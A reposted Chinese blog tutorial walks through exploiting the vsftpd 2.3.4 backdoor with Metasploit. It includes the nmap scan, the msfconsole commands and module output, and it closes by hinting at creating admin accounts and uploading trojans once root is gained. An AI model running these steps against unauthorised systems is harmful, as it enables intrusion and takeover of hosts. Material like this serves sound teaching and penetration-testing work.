metasploit利用vsftpd漏洞獲取root權限


vsftpd version 2到2.3.4存在后門漏洞,攻擊者可以通過該漏洞獲取root權限。這 里用backtrack 集成的metasploit做測試,metasploit集成了各種各樣的漏洞,我們可以在上面利用服務器、個人PC和應用程序的漏洞。開始菜單路徑 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit內置的nmap進行主機掃描

1 nmap -sT -A www.91ri.org -sT

是指用隱蔽的tcp進行連接,-A是指在探測中對服務進行詳細的版本測試。nmap是一款強大的掃描工具,簡單的一些用法可以點擊:《Nmap在實戰中的高級用法》文章查看。

使用nmap結果圖(單擊可放大):

結果顯示目標主機上運行着ftp服務器,版本為vsftpd2.3.4,這個版本的vsftpd存在漏洞,攻擊者可以遠程獲取目標主機的root權限。

下面利用metasploit實施攻擊過程,進入metasploit命令行,search vsftpd,搜索有關vsftpd的相關工具和攻擊載荷。查找結果如下:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date          Rank       Description
—-                                  —————          —-       ———–
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

利用該漏洞命令:

use exploit/unix/ftp/vsftpd_234_backdoor

這樣提示符就會提示進入到該路徑下,show options查看需要設置的相關項:

msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
—-   —————  ——–  ———–
RHOST                   yes       The target address
RPORT    21          yes       The target port

Exploit target:

Id  Name
–  —-
0   Automatic

提示需要設置RHOST(攻擊目標的IP)、RPORT(目標端口),由於這里是攻擊ftp軟件,端口默認為21,我們設置一下目標的ip,命令: set rhost 192.168.1.101, 在輸入show options回車,確認下參數設置正確。檢查無誤,輸入命令help,查看相關的操縱,一般是run或者exploit即可實施攻擊.

結果如圖(單擊放大)

結果顯示已經獲取了目標主機的root權限,建立管理員賬號、上傳木馬等動作就可以開始了。剩下的你懂得!

91ri.org:文章很簡單 只是普通的exploit使用教程 不過我轉這篇文章只想告訴大家metasploit不是只有ms08067!!!!!!! 最近在各個群里看過多了 所以再轉篇科普。強烈推薦:《傳說中的metasploit滲透防御終極手冊?》文章,文末暴力評論值得深思!

原文 :http://happyrxk.cn/?post=11


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM